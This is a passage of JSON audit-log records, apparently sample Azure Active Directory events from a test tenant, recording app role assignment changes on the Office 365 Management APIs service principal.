Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464425"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "7f09b681-251f-4ff0-97cf-5247891b6981"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": 
"asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": 
"18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464434"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, 
{"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "d8a2ae24-a752-4f8e-adca-c57189a76a71"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", 
"Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464425"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "7f09b681-251f-4ff0-97cf-5247891b6981"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": 
"2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": 
[{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": 
"31CXC"}, {"Name": "env_seqNum", "Value": "38464434"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "d8a2ae24-a752-4f8e-adca-c57189a76a71"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, 
{"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464425"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": 
"1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "7f09b681-251f-4ff0-97cf-5247891b6981"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": 
"ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": 
"[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372061"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, 